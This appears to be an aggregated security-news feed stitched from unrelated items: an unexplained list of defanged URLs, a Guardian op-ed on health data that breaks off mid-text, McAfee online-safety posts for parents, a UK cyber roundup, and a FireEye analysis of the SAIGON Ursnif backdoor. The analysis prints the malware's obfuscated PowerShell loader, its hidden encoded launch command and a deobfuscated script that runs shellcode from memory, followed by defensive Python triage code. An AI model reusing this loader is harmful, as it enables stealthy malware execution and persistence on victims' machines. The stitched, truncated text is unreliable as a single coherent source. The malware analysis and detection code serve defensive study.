URL: http://classico.]nextmp.]net/
URL: http://www.]nationaltiledistribution.]com/
URL: http://bloomingtrails.]com/
URL: http://redcellmedical.]com/
URL: http://patesting.]ie/
URL: http://www.]bysicilia.]it/
URL: http://kibellariding.]com/
URL: https://www.]ladoudounesolde.]com/
URL: http://www.]anjelskedarceky.]sk/
URL: https://poolstore.]com.]au/
URL: http://sklepsilvermagic.]pl/
URL: http://www.]uebuys.]com/
URL: http://www.]reynsaon.]com/
URL: http://eshop.]javwireless.]com/
URL: http://alphafxtestbooster.]com/
URL: https://decor-boutique.]com/
URL: http://www.]kevinbuou.]com/
URL: https://www.]aioma.]it/
URL: http://luxuryjewelleryto.]com/

Our personal health history is too valuable to be harvested by the tech giants | Eerke Boiten

Action to prevent deeper access to our private lives and data is more essential than ever

Health data paints a rich picture of our lives. Even if you remove your name, date of birth and NHS number to “anonymise” yourself, a full health history will reveal your age, gender, the places where you have lived, your family relationships and aspects of your lifestyle.

Used in combination with other available information, this may be enough to verify that this medical history relates to you personally and to target you online. Consequently, whenever the NHS shares health data, even if it is anonymised, we need to have confidence in who it goes to and what they can do with it.

When data about us influences a credit rating or a hiring decision, we are unlikely ever to find out


How You (and Your Teen) Can Stay Safe While Looking for Love Online

Valentine’s Day is such a double-edged sword. If you’re feeling the love and just can’t get enough of your sweetheart – then I wish you a wonderful day. If, on the other hand, you are unattached and feeling a little lonely then chances are you’re thinking about trying your luck on an online dating app.

Every year, traffic to dating apps surges around Valentine’s Day because let’s be honest – who wants to be lonely? But it’s not just adults who frequent dating sites to find their perfect match – teens do too!

Dating Apps – Proceed with Caution!!!

The increasing popularity of these sites means that scammers are spending considerable time and energy targeting people to con. And don’t forget that many teens are on these sites too – even as young as 16! You don’t have to look far to find stories of people who have been tricked into transferring large sums of money to their ‘online lovers’. And in more recent years, romance scammers are now tricking new partners into illegally relaying stolen funds!

Romance Scammers Now Searching for New ‘Online Love’ in Games

According to the Australian Competition and Consumer Commission (ACCC), romance scammers are now also targeting non-dating apps to look for new vulnerable ‘online lovers’. In fact, 38 Aussies lost almost $600,000 through gaming app Words with Friends, an online version of Scrabble. Most of the losses were through direct bank transfers; however, iTunes, Steam and Google Play gift cards were also commonly used. Games such as Words with Friends are very popular with both tweens and teens, so please share these stories with them.

How to Stay Safe While Searching for Love Online

I have several friends who have found the ‘love of their lives’ online so please remember that not everyone you meet online is a scammer. However, it is essential that you are ALWAYS on guard and cautiously suspicious until such time as your new online love has proven themselves. Here are my top tips for staying safe:

  1. Limit how personal you get 

    Scammers today prey on the human need to feel connected to one another. The key is to always be careful with the information that you share online. Whether it’s Tinder, OkCupid, Bumble, or even Facebook or Instagram, only share what is absolutely necessary. The details you share can easily be pieced together by a scammer to access your personal information, your bank accounts or even steal your identity. Start with being clever with your profile names on dating sites and apps – never give out your full name.

  2. Do your homework

    If you’ve met someone online, always do your homework before meeting them in person. Why not get Google working for you? A Google search is a great place to start and even using Google Images will help you get a better understanding of a person. And don’t forget to check out their LinkedIn account too. Another option would be to track down mutual friends and ask questions about your new online partner.

  3. Think before you send

    Sharing intimate pictures or videos with the person you’re dating online may seem like a good idea right now but please take a moment before pressing send to think about how this could come back to haunt you in the future. Remember, once those pictures and videos are online, they are online forever. Even social media apps with disappearing images, such as Snapchat, can be easily circumvented with a screenshot. It’s not just celebrities who have intimate pictures spread around the Internet!

  4. Make passwords a priority

    Ensure all your online dating and social media accounts, and all your devices, have separate and unique passwords. Ideally, each password should have a combination of lower and upper case letters, numbers and special characters. I love using a nonsensical, crazy sentence!

And please remember to share your online romance vigilance with your budding teen Romeos and Juliets. It is incredibly common for teens to use dating sites to find someone special. Even though it may be a tad awkward and uncomfortable, as parents we need to do all we can to keep our offspring safe – particularly when their hormones are raging!!

Till Next Time!!

Happy Valentine’s Day!!

The post How You (and Your Teen) Can Stay Safe While Looking for Love Online appeared first on McAfee Blogs.

Safer Internet Day 2020

What Can You Do To Make The Internet a Better Place

In 2020, you’d be hard-pressed to find an Aussie teen who doesn’t spend a fair whack of their time online. And while many of us parents don’t always love the time our offspring spend glued to screens, most of us have come to accept that the online world is a big part of our kids’ lives.

So, let’s accept that the internet is going to be a feature of our kids’ lives and work out how best we can keep them safe.

Together For A Better Internet

Today is Safer Internet Day – an international annual event that encourages us all to work together for a better internet. The perfect opportunity to find out what we can do as parents to ensure our kids are as safe as possible online.

Organised by the joint Insafe/INHOPE network, with the support of the European Commission, Safer Internet Day is held each February to promote the safe and positive use of digital technology, especially among children and young people. Safer Internet Day is all about inspiring users to make positive changes online, to raise awareness of online safety issues, and participate in events and activities right across the globe.

What Can We Do As Parents?

As role models and life-educators, parents play an enormous role in shaping our kids’ behaviours and opinions – particularly before they get to the teenage years!! So, why not use Safer Internet Day as a prompt to freshen up your cybersafety chats with your brood.

Not sure where to start? Here are my top messages to weave into your chats with your kids:

  1. Be Kind Online

Spread love not hate online. A better internet includes building an online culture where people share positive and encouraging posts and comments. It may be as simple as posting a positive message, liking a post that is encouraging or sharing an inspiring article.

It may sound obvious but before you post a comment or a tweet, ask yourself whether the message could offend someone or impact them negatively. And remember to NEVER like, favourite, retweet, post or comment negatively online.

  2. Learn How To Disagree Respectfully Online

No matter how much we try, there will always be some people online who get a kick out of being unkind. If you come across this behaviour, I encourage you to call it out and report it but ALWAYS do so in a respectful fashion. Reciprocating with harsh words or name-calling will only further inflame a toxic situation. A logical, factual response that is respectful will always triumph!

  3. Protecting Your Online Reputation (& Others Too)

If you’re planning on hiring someone or even going on a date with someone, the chances are you’re going to ‘Google’ them first. And what you find online and the opinion you form decides whether the person’s digital reputation is acceptable or not.

So, it’s essential to remember that everything you post online is permanent and public. Don’t post inappropriate comments or pics of yourself or others; ensure all your online profiles are set to private to avoid strangers ‘screen-grabbing’ your private info and photos; don’t respond to inappropriate requests; and, most importantly, take a breather when things are getting heated online, as you may regret your comments and actions.

  4. Passwords!!!!!

Managing passwords is one of the best ways of taking control of your online life and creating a better internet. Ensuring you have a separate password for every online account means that if you are affected by a data breach, your other online accounts are not at risk. Always choose passwords that have letters, numbers and symbols and ensure they are complex and not obvious. I love using a nonsensical sentence! And if all that’s too hard, why not consider a password manager that not only creates complex passwords for each of your online accounts but remembers them too. All you need to do is remember the master password! Awesome!!

So, why not pledge to change up your cybersafety chats with your kids this Safer Internet Day? And remember – they are watching you too! So, ensure you always model online respect, take your online responsibilities seriously and also manage your passwords carefully. Because every little step is a step towards a positive change.

The post Safer Internet Day 2020 appeared first on McAfee Blogs.

Spotting Fake News: Teaching Kids to be Responsible Online Publishers


Editor’s note: This is part II in a series on Fake News. Read part I, here.

Kids today are not equipped to deal with the barrage of digital information coming at them every day. Add to that, the bulk of information that may be fake, misleading, or even malicious. So how do we help kids become more responsible for the content they share online?

We do it one conversation at a time.

When it comes to the mounting influence of fake news, it’s easy to point the finger at the media, special interest groups, politicians, and anyone else with an agenda and internet access. While many of these groups may add to the problem, each one of us plays a role in stopping it.

What’s our role?

We, the connected consumer, now play such a significant role in how content is created and disseminated, that a large part of the solution comes down to individual responsibility — yours and mine.

The shift begins with holding ourselves accountable for every piece of content we read, create, or share online. That shift gains momentum when we equip our kids to do the same.

Teach personal responsibility. Start the conversation around personal responsibility early with your kids and keep it going. Explain that every time we share fake news, a rumor, or poorly sourced material, we become one cog in the wheel of spreading untruths and even malicious fabrications. We become part of the problem. Challenge your child to become a trustworthy, discerning source of information as opposed to being viewed by others as an impulsive, unreliable source.

Discuss the big picture. Fake news or misleading content isn’t just annoying; it’s harmful in a lot of other ways. Misinformation undermines trust, causes division, can spark social unrest, and harm unity. More than that, fake news edges out helpful, factual, content designed to educate and inform.

Be aware of confirmation bias. Confirmation bias is gravitating toward ideas, people, and content that echoes our spiritual, social, political, or moral points of view. Confirmation bias tempts us to disregard information that opposes our ideology. While confirmation bias is part of our human nature, left unchecked, it can be an obstacle to learning factual information.

Chill, don’t spill. Fake news is designed to advance a personal agenda. This is especially true during times of social tension when tempers are running high. Don’t take the emotional bait. Exercise discernment. Before sharing, read legitimate news sources that offer balanced coverage, so the story you share or opinion you express is based on accurate information.

Be a free thinker. Our kids have grown up in a world where ‘like’ and ‘share’ counts somehow equate to credibility. Encourage kids to break away from the crowd and have the courage to be free, independent thinkers.

Challenge content by asking:

  • Do I understand all the points of view of this story?
  • What do I really think about this topic or idea?
  • Am I overly emotional and eager to share this?
  • Am I being manipulated by this content?
  • What if I’m wrong?

Question every source. Studies show that people assume that the higher something ranks in search results, the more factual or trustworthy the information is. Wrong. Algorithms retrieve top content based on keywords, not accuracy. So, dig deeper and verify sources.

5 ways to spot fake news

1. Look closely at the source. Fake news creators are good at what they do. While some content has detectable errors, others are sophisticated and strangely persuasive. So, take a closer look. Test credibility by asking:

  • Where is the information coming from? 
  • Is this piece satire?
  • Is the author of the article, bio, and website legitimate? 
  • Are studies, infographics, and quotes appropriately attributed?
  • Is the URL legitimate (cnn.com vs. cnn.com.co)?
  • Are there red flags such as unknown author, all capital letters, misspellings, or grammar errors?

2. Be discerning with viral content. Often a story will go viral because it’s so unbelievable. So pause before you share. Google the story’s headline to see if the story appears in other reliable publications.

3. Pay attention to publish dates, context. Some viral news items may not be entirely false, just intentionally shared out of context. Fake news creators often pull headlines or stories from the past and present them as current news to fit the desired narrative.

4. Beware of click-bait headlines. A lot of fake news is carefully designed with user behavior in mind. A juicy headline leads to a false news story packed with even more fake links that take you to a product page or, worse, download malware onto your computer, putting your data and privacy at risk. These kinds of fake news scams capitalize on emotional stories such as the recent tragic death of basketball great Kobe Bryant.

5. Verify information. It takes extra effort, but plenty of sites exist that can help you verify a piece of information. Before sharing a piece of content, check it out on sites like:

  • Snopes.com
  • Factcheck.com
  • Politifact.org
  • Opensecrets.org
  • Truthorfiction.com
  • Hoaxslayer.com

While fake news isn’t a new phenomenon, thanks to technology’s amplification power, it’s reached new levels of influence and deception. This social shift makes it imperative to get in front of this family conversation as soon as possible, especially since we’re headed into an election year.

The post Spotting Fake News: Teaching Kids to be Responsible Online Publishers appeared first on McAfee Blogs.

Cyber Security Roundup for February 2020

A roundup of UK focused cyber and information security news stories, blog posts, reports and threat intelligence from the previous calendar month, January 2020.

After years of dither and delay the UK government finally nailed its colours to the mast, no not Brexit but Huawei, permitting 'limited use' of the Chinese Telecoms giant's network appliances within the UK's new 5G infrastructure. Whether this is a good decision depends more on individual political persuasion than national security interest, so just like Brexit the general view on the decision is binary, either it's a clever compromise or a complete sell out of UK national security. I personally believe the decision is more about national economics than national security, as I previously blogged in 'The UK Government Huawei Dilemma and the Brexit Factor'. The UK government is playing a delicate balancing act to safeguard potentially massive trade deals with both of the world's largest economic superpowers, China and the United States. An outright US-style ban on Huawei would seriously jeopardise billions of pounds worth of Chinese investment into the UK economy. While on the security front, Huawei's role will be restricted to protect the UK's critical national infrastructure, with Huawei's equipment banned from use within the core of the 5G infrastructure. The UK National Cyber Security Centre (NCSC) published a document which provides guidance to high risk network providers on the use of Huawei tech.
UK Gov agrees to 'limited' Huawei involvement within UK 5G

UK business targeted ransomware continues to rear its ugly head in 2020, this time global foreign exchange firm Travelex's operations were all brought to a shuddering halt after a major ransomware attack took down Travelex's IT systems. Travelex services impacted included their UK business, international websites, mobile apps, and white-labelled services for the likes of Tesco, Sainsburys, Virgin Money, Barclays and RBS. The ransomware in question was named as Sodinokibi, with numerous media reports strongly suggesting the Sodinokibi ransomware infiltrated the Travelex network through unpatched vulnerable Pulse Secure VPN servers, which the National Cyber Security Centre had apparently previously detected and warned Travelex about many months earlier. Could be some truth in this, given the Sodinokibi ransomware is known to infect through remote access systems, including vulnerable Pulse Secure VPN servers. The cybercriminal group behind the attack, also known as Sodin and REvil, demanded £4.6 million in ransom payment, and had also claimed to have taken 5Gb of Travelex customer data. Travelex reported no customer data had been breached, however, its money exchange services remained offline for well over two weeks after reporting the incident, with the firm advising it expected most of its travel exchange services to be back operational by the end of January.

The same Sodinokibi criminal group behind the Travelex attack also claimed responsibility for what was described by German automotive parts supplier Gedia Automotive Group, as a 'massive cyber attack'. Gedia said it would take weeks to months before its IT systems were up and running as normal. According to analysis by US cyber security firm Bad Packets, the German firm also had an unpatched Pulse Secure VPN server on its network perimeter which left it exposed to the ransomware attack. Gedia patched their server VPN on 4th January.

Leeds based medical tech company Tissue Regenix halted its US manufacturing operation after an unauthorised party accessed its IT systems. To date there haven't been any details about the nature of this cyber attack, but a manufacturing shutdown is a hallmark of a mass ransomware infection. Reuters reported shares in the company dropped 22% following their cyber attack disclosure.

London based marine consultancy company LOC was hacked and held to ransom by cybercriminals. It was reported computers were 'locked' and 300Gb of company data were stolen by a criminal group; investigations on this hack are still ongoing.

It seems every month I report a massive data breach due to the misconfiguration of a cloud server, but I never expected one of the leading global cloud providers, Microsoft, to be caught out by such a schoolboy error. Microsoft reported a database misconfiguration of their Elasticsearch servers exposed 250 million customer support records between 5th and 19th December 2019. Some of the non-redacted data exposed included customer email addresses; IP addresses; locations; descriptions of customer support claims and cases; Microsoft support agent emails; case numbers, resolutions and remarks; and confidential internal notes. It is not known if any unauthorised parties had accessed any of the leaked data.

Cyber attacks against the UK defence industry hit unprecedented highs according to government documentation obtained by Sky News. Sky News revealed the MoD and its partners failed to protect military and defence data in 37 incidents in 2017 and 34 incidents in the first 10 months of 2018, with military data exposed to nation-level cyber actors on dozens of occasions.

It was another fairly busy month for Microsoft patches, including an NSA revealed critical flaw in Windows 10. January also saw the end of security updates support for Windows 7 and Windows Server 2008, unless you pay Microsoft extra for extended support.

According to a World Economic Forum (WEF) study, cybersecurity at most of the world's airports is not up to scratch. WEF reported 97 of the world’s 100 largest airports have vulnerable web and mobile applications, misconfigured public cloud and dark web leaks. A summary of the findings:

  • 97% of the websites contain outdated web software.
  • 24% of the websites contain known and exploitable vulnerabilities.
  • 76% and 73% of the websites are not compliant with GDPR and PCI DSS, respectively.
  • 100% of the mobile apps contain at least five external software frameworks.
  • 100% of the mobile apps contain at least two vulnerabilities.

Elsewhere in the world, it was reported a US Department of Defence contractor had its web servers (and thus its websites) taken down by the Ryuk ransomware. Houston-based steakhouse Landry advised it was hit by a point-of-sale malware attack which stole customer payment card data. Stolen customer payment card data taken from a Pennsylvania-based convenience store and petrol station operator was found for sale online. Ahead of the Superbowl LIV Twitter and Facebook accounts for 15 NFL teams were hacked. The hacking group OurMine took responsibility for the NFL franchise attacks, which said it was to demonstrate internet security was "still low" and had to be improved upon. Sonos apologised after accidentally revealing hundreds of customer email addresses to each other. And a ransomware took a US Maritime base offline for 30 hours.

Dallas County Attorney finally applied some common sense, dropping charges against two Coalfire Red Teamers. The two Coalfire employees had been arrested on 11th September 2019 while conducting a physical penetration test of the Dallas County courthouse. The Perry News quoted a police report which said upon arrest the two men stated, “they were contracted to break into the building for Iowa courts to check the security of the building”. After the charges were dropped at the end of January Coalfire CEO Tom McAndrew said, “With positive lessons learned, a new dialogue now begins with a focus on improving best practices and elevating the alignment between security professionals and law enforcement”. He added, “We’re grateful to the global security community for their support throughout this experience.”



SAIGON, the Mysterious Ursnif Fork

Ursnif (aka Gozi/Gozi-ISFB) is one of the oldest banking malware families still in active distribution. While the first major version of Ursnif was identified in 2006, several subsequent versions have been released in large part due to source code leaks. FireEye reported on a previously unidentified variant of the Ursnif malware family to our threat intelligence subscribers in September 2019 after identification of a server that hosted a collection of tools, which included multiple point-of-sale malware families. This malware self-identified as "SaiGon version 3.50 rev 132," and our analysis suggests it is likely based on the source code of the v3 (RM3) variant of Ursnif. Notably, rather than being a full-fledged banking malware, SAIGON's capabilities suggest it is a more generic backdoor, perhaps tailored for use in targeted cybercrime operations.

Technical Analysis

Behavior

SAIGON appears on an infected computer as a Base64-encoded shellcode blob stored in a registry key, which is launched using PowerShell via a scheduled task. As with other Ursnif variants, the main component of the malware is a DLL file. This DLL has a single exported function, DllRegisterServer, which is an unused empty function. All the relevant functionality of the malware executes when the DLL is loaded and initialized via its entry point.

Upon initial execution, the malware generates a machine ID using the creation timestamp of either %SystemDrive%\pagefile.sys or %SystemDrive%\hiberfil.sys (whichever is identified first). Interestingly, the system drive is queried in a somewhat uncommon way, directly from the KUSER_SHARED_DATA structure (via SharedUserData→NtSystemRoot). KUSER_SHARED_DATA is a structure located in a special part of kernel memory that is mapped into the memory space of all user-mode processes (thus shared), and always located at a fixed memory address (0x7ffe0000, pointed to by the SharedUserData symbol).

The code then looks for the current shell process by using a call to GetWindowThreadProcessId(GetShellWindow(), …). The code also features a special check; if the checksum calculated from the name of the shell's parent process matches the checksum of explorer.exe (0xc3c07cf0), it will attempt to inject into the parent process instead.

SAIGON then injects into this process using the classic VirtualAllocEx / WriteProcessMemory / CreateRemoteThread combination of functions. Once this process is injected, it loads two embedded files from within its binary:

  • A PUBLIC.KEY file, which is used to verify and decrypt other embedded files and data coming from the malware's command and control (C2) server
  • A RUN.PS1 file, which is a PowerShell loader script template that contains a "@SOURCE@" placeholder within the script:

$hanksefksgu = [System.Convert]::FromBase64String("@SOURCE@");
Invoke-Expression ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("JHdneG1qZ2J4dGo9JGh
hbmtzZWZrc2d1Lkxlbmd0aDskdHNrdm89IltEbGxJbXBvcnQoYCJrZXJuZWwzMmAiKV1gbnB1YmxpYyBzdGF
0aWMgZXh0ZXJuIEludDMyIEdldEN1cnJlbnRQcm9jZXNzKCk7YG5bRGxsSW1wb3J0KGAidXNlcjMyYCIpXWB
ucHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIEdldERDKEludFB0ciBteHhhaHhvZik7YG5bRGxsSW1wb3J0K
GAia2VybmVsMzJgIildYG5wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgQ3JlYXRlUmVtb3RlVGhyZWFkKEl
udFB0ciBoY3d5bHJicywgSW50UHRyIHdxZXIsdWludCBzZmosSW50UHRyIHdsbGV2LEludFB0ciB3d2RyaWN
0d2RrLHVpbnQga2xtaG5zayxJbnRQdHIgdmNleHN1YWx3aGgpO2BuW0RsbEltcG9ydChgImtlcm5lbDMyYCI
pXWBucHVibGljIHN0YXRpYyBleHRlcm4gVUludDMyIFdhaXRGb3JTaW5nbGVPYmplY3QoSW50UHRyIGFqLC
BVSW50MzIga2R4c3hldik7YG5bRGxsSW1wb3J0KGAia2VybmVsMzJgIildYG5wdWJsaWMgc3RhdGljIGV4dG
VybiBJbnRQdHIgVmlydHVhbEFsbG9jKEludFB0ciB4eSx1aW50IGtuYnQsdWludCB0bXJ5d2h1LHVpbnQgd2d1
dHVkKTsiOyR0c2thYXhvdHhlPUFkZC1UeXBlIC1tZW1iZXJEZWZpbml0aW9uICR0c2t2byAtTmFtZSAnV2luMzI
nIC1uYW1lc3BhY2UgV2luMzJGdW5jdGlvbnMgLXBhc3N0aHJ1OyRtaHhrcHVsbD0kdHNrYWF4b3R4ZTo6Vml
ydHVhbEFsbG9jKDAsJHdneG1qZ2J4dGosMHgzMDAwLDB4NDApO1tTeXN0ZW0uUnVudGltZS5JbnRlcm9wU
2VydmljZXMuTWFyc2hhbF06OkNvcHkoJGhhbmtzZWZrc2d1LDAsJG1oeGtwdWxsLCR3Z3htamdieHRqKTskd
GRvY25ud2t2b3E9JHRza2FheG90eGU6OkNyZWF0ZVJlbW90ZVRocmVhZCgtMSwwLDAsJG1oeGtwdWxsLC
RtaHhrcHVsbCwwLDApOyRvY3h4am1oaXltPSR0c2thYXhvdHhlOjpXYWl0Rm9yU2luZ2xlT2JqZWN0KCR0ZG
9jbm53a3ZvcSwzMDAwMCk7")));

The malware replaces the "@SOURCE@" placeholder from this PowerShell script template with a Base64-encoded version of itself, and writes the PowerShell script to a registry value named "PsRun" under the "HKEY_CURRENT_USER\Identities\{<random_guid>}" registry key (Figure 1).


Figure 1: PowerShell script written to PsRun

The instance of SAIGON then creates a new scheduled task (Figure 2) with the name "Power<random_word>" (e.g. PowerSgs). If this is unsuccessful for any reason, it falls back to using the "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" registry key to enable itself to maintain persistence through system reboot.


Figure 2: Scheduled task

Regardless of the persistence mechanism used, the command that executes the binary from the registry is similar to the following:

PowerShell.exe -windowstyle hidden -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwASQBkAGUAbgB0AGkAdABpAGUAcwBcAHsANAAzAEIA
OQA1AEUANQBCAC0ARAAyADEAOAAtADAAQQBCADgALQA1AEQANwBGAC0AMgBDADcAOAA5AEMANQA5
AEIAMQBEAEYAfQAnACkALgBQAHMAUgB1AG4A

After removing the Base64 encoding from this command, it looks something like "iex (gp 'HKCU:\\Identities\\{43B95E5B-D218-0AB8-5D7F-2C789C59B1DF}').PsRun."  When executed, this command retrieves the contents of the previous registry value using Get-ItemProperty (gp) and executes it using Invoke-Expression (iex).
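The decoding step described above can be turned into a triage check for command lines collected from scheduled task actions or Run key values. The following Python is an added example, not code from the original report; the function names and the benign sample are constructed for illustration, and the encoded argument in PAGE_SAMPLE is the one quoted above.

```python
import base64
import binascii
import re

# iex / Invoke-Expression applied to a registry value read with
# gp / Get-ItemProperty, the shape of the decoded command shown above.
REGISTRY_LOADER = re.compile(
    r"""\b(?:iex|invoke-expression)\s*\(\s*
        (?:gp|get-itemproperty)\s+
        ['"]?(?P<key>HK(?:CU|LM):\\+[^'")]+?)['"]?\s*\)
        \s*\.\s*(?P<value>\w+)""",
    re.IGNORECASE | re.VERBOSE,
)

# Key location named in the report: HKCU:\Identities\{<random_guid>}
PAGE_KEY = re.compile(
    r"^HKCU:\\+Identities\\+\{[0-9A-F]{8}(?:-[0-9A-F]{4}){3}-[0-9A-F]{12}\}$",
    re.IGNORECASE,
)


def extract_encoded_arg(cmdline):
    """Return the argument of -ec / -e / -enc / -EncodedCommand, or None."""
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        if tok[0] not in "-/":
            continue
        name = tok[1:].lower()
        # PowerShell accepts -ec and any prefix of -EncodedCommand.
        if name == "ec" or (name and "encodedcommand".startswith(name)):
            return tokens[i + 1]
    return None


def decode_encoded_command(b64):
    """-EncodedCommand carries Base64 over UTF-16LE text."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None


def triage_command_line(cmdline):
    """Decode an encoded PowerShell command line and describe what it runs."""
    b64 = extract_encoded_arg(cmdline)
    if b64 is None:
        return None  # nothing encoded on this command line
    script = decode_encoded_command(b64)
    finding = {
        "decoded": script,
        "hidden_window": bool(re.search(r"-w\w*\s+hidden", cmdline, re.I)),
        "registry_key": None,
        "value_name": None,
        "matches_page_pattern": False,
    }
    match = REGISTRY_LOADER.search(script or "")
    if match:
        finding["registry_key"] = match.group("key")
        finding["value_name"] = match.group("value")
        finding["matches_page_pattern"] = bool(
            PAGE_KEY.match(match.group("key"))
            and match.group("value").lower() == "psrun"
        )
    return finding


# Command line quoted in the report (Base64 re-joined onto one argument).
PAGE_SAMPLE = (
    "PowerShell.exe -windowstyle hidden -ec "
    "aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwASQBkAGUAbgB0AGkAdABpAGUAcwBcAHsANAAzAEIA"
    "OQA1AEUANQBCAC0ARAAyADEAOAAtADAAQQBCADgALQA1AEQANwBGAC0AMgBDADcAOAA5AEMANQA5"
    "AEIAMQBEAEYAfQAnACkALgBQAHMAUgB1AG4A"
)
# Constructed benign sample: an administrator running an encoded Get-Date.
BENIGN_SAMPLE = "powershell.exe -NoProfile -EncodedCommand " + base64.b64encode(
    "Get-Date".encode("utf-16-le")
).decode("ascii")

if __name__ == "__main__":
    for sample in (PAGE_SAMPLE, BENIGN_SAMPLE):
        print(triage_command_line(sample))
```

A match on the key path and value name is a lead for inspecting the registry value itself, since the GUID is random per host and only the layout is stable.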

Finally, the PowerShell code in the registry allocates a block of memory, copies the Base64-decoded shellcode blob into it, launches a new thread pointing to the area using CreateRemoteThread, and waits for the thread to complete. The following script is a deobfuscated and beautified version of the PowerShell.

$hanksefksgu = [System.Convert]::FromBase64String("@SOURCE@");
$wgxmjgbxtj = $hanksefksgu.Length;

$tskvo = @"
[DllImport("kernel32")]
public static extern Int32 GetCurrentProcess();

[DllImport("user32")]
public static extern IntPtr GetDC(IntPtr mxxahxof);

[DllImport("kernel32")]
public static extern IntPtr CreateRemoteThread(IntPtr hcwylrbs, IntPtr wqer, uint sfj, IntPtr wllev, IntPtr wwdrictwdk, uint klmhnsk, IntPtr vcexsualwhh);

[DllImport("kernel32")]
public static extern UInt32 WaitForSingleObject(IntPtr aj, UInt32 kdxsxev);

[DllImport("kernel32")]
public static extern IntPtr VirtualAlloc(IntPtr xy, uint knbt, uint tmrywhu, uint wgutud);
"@;

$tskaaxotxe = Add-Type -memberDefinition $tskvo -Name 'Win32' -namespace Win32Functions -passthru;
$mhxkpull = $tskaaxotxe::VirtualAlloc(0, $wgxmjgbxtj, 0x3000, 0x40);[System.Runtime.InteropServices.Marshal]::Copy($hanksefksgu, 0, $mhxkpull, $wgxmjgbxtj);
$tdocnnwkvoq = $tskaaxotxe::CreateRemoteThread(-1, 0, 0, $mhxkpull, $mhxkpull, 0, 0);
$ocxxjmhiym = $tskaaxotxe::WaitForSingleObject($tdocnnwkvoq, 30000);

Once it has established a foothold on the machine, SAIGON loads and parses its embedded LOADER.INI configuration (see the Configuration section for details) and starts its main worker thread, which continuously polls the C2 server for commands.

Configuration

The Ursnif source code incorporated a concept referred to as "joined data," which is a set of compressed/encrypted files bundled with the executable file. Early variants relied on a special structure after the PE header and marked with specific magic bytes ("JF," "FJ," "J1," "JJ," depending on the Ursnif version). In Ursnif v3 (Figure 3), this data is no longer simply after the PE header but pointed to by the Security Directory in the PE header, and the magic bytes have also been changed to "WD" (0x4457).


Figure 3: Ursnif v3 joined data

This structure defines the various properties (offset, size, and type) of the bundled files. This is the same exact method used by SAIGON for storing its three embedded files:

  • PUBLIC.KEY - RSA public key
  • RUN.PS1 - PowerShell script template
  • LOADER.INI - Malware configuration
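As an added example (not code from the original report), the following Python check triages a PE file by testing whether its Security Directory points at data starting with the "WD" magic described above rather than at an Authenticode certificate. The function names, the build_minimal_pe helper and the sample bytes are constructed for illustration.

```python
import struct

JOINED_MAGIC_V3 = b"WD"      # 0x4457 stored as a little-endian WORD
SECURITY_DIR_INDEX = 4       # IMAGE_DIRECTORY_ENTRY_SECURITY
WIN_CERT_REVISIONS = (0x0100, 0x0200)
WIN_CERT_TYPES = (1, 2, 3, 4)


class PEFormatError(ValueError):
    """Raised when the input is not a parseable PE image."""


def security_directory(pe: bytes):
    """Return (file_offset, size) of the Security Directory entry.

    Unlike the other data directories, this entry holds a raw file offset,
    not an RVA, so no section mapping is needed.
    """
    if len(pe) < 0x40 or pe[:2] != b"MZ":
        raise PEFormatError("missing MZ header")
    (e_lfanew,) = struct.unpack_from("<I", pe, 0x3C)
    if e_lfanew + 24 > len(pe) or pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise PEFormatError("missing PE signature")
    (opt_size,) = struct.unpack_from("<H", pe, e_lfanew + 20)
    opt = e_lfanew + 24
    if opt_size < 2 or opt + opt_size > len(pe):
        raise PEFormatError("truncated optional header")
    (magic,) = struct.unpack_from("<H", pe, opt)
    if magic == 0x10B:       # PE32
        dirs = 96
    elif magic == 0x20B:     # PE32+
        dirs = 112
    else:
        raise PEFormatError("unknown optional header magic")
    if opt_size < dirs:
        raise PEFormatError("optional header has no data directories")
    (count,) = struct.unpack_from("<I", pe, opt + dirs - 4)
    entry = dirs + 8 * SECURITY_DIR_INDEX
    if count <= SECURITY_DIR_INDEX or entry + 8 > opt_size:
        return (0, 0)
    return struct.unpack_from("<II", pe, opt + entry)


def classify_security_data(pe: bytes) -> str:
    """Label what the Security Directory points at.

    Only the leading magic is checked; the layout of the joined-data
    structure beyond the magic is not described in the text.
    """
    offset, size = security_directory(pe)
    if offset == 0 or size == 0:
        return "none"
    if size < 2 or offset + size > len(pe):
        return "out-of-bounds"
    if pe[offset:offset + 2] == JOINED_MAGIC_V3:
        return "joined-data"
    if size >= 8:
        # WIN_CERTIFICATE header: dwLength, wRevision, wCertificateType
        length, revision, cert_type = struct.unpack_from("<IHH", pe, offset)
        if (revision in WIN_CERT_REVISIONS and cert_type in WIN_CERT_TYPES
                and 8 <= length <= size):
            return "authenticode"
    return "unknown"


def build_minimal_pe(trailer: bytes, pe32plus: bool = False) -> bytes:
    """Constructed test input: headers only, with `trailer` appended and
    referenced by the Security Directory (hypothetical helper)."""
    dirs = 112 if pe32plus else 96
    opt_size = dirs + 16 * 8
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)
    file_hdr = struct.pack("<HHIIIHH", 0x8664 if pe32plus else 0x14C,
                           0, 0, 0, 0, opt_size, 0x2102)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x20B if pe32plus else 0x10B)
    struct.pack_into("<I", opt, dirs - 4, 16)
    headers_len = 0x40 + 4 + len(file_hdr) + opt_size
    struct.pack_into("<II", opt, dirs + 8 * SECURITY_DIR_INDEX,
                     headers_len if trailer else 0, len(trailer))
    return bytes(dos) + b"PE\0\0" + file_hdr + bytes(opt) + trailer


if __name__ == "__main__":
    sample = build_minimal_pe(b"WD" + bytes(30))   # constructed, not a real sample
    print(security_directory(sample), classify_security_data(sample))
```

A "joined-data" result on a file that claims to be signed is worth a closer look, because the directory that normally carries the signature is being used as a data container.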

The following is a list of configuration options observed:

| Name Checksum | Name | Description |
| --- | --- | --- |
| 0x97ccd204 | HostsList | List of C2 URLs used for communication |
| 0xd82bcb60 | ServerKey | Serpent key used for communicating with the C2 |
| 0x23a02904 | Group | Botnet ID |
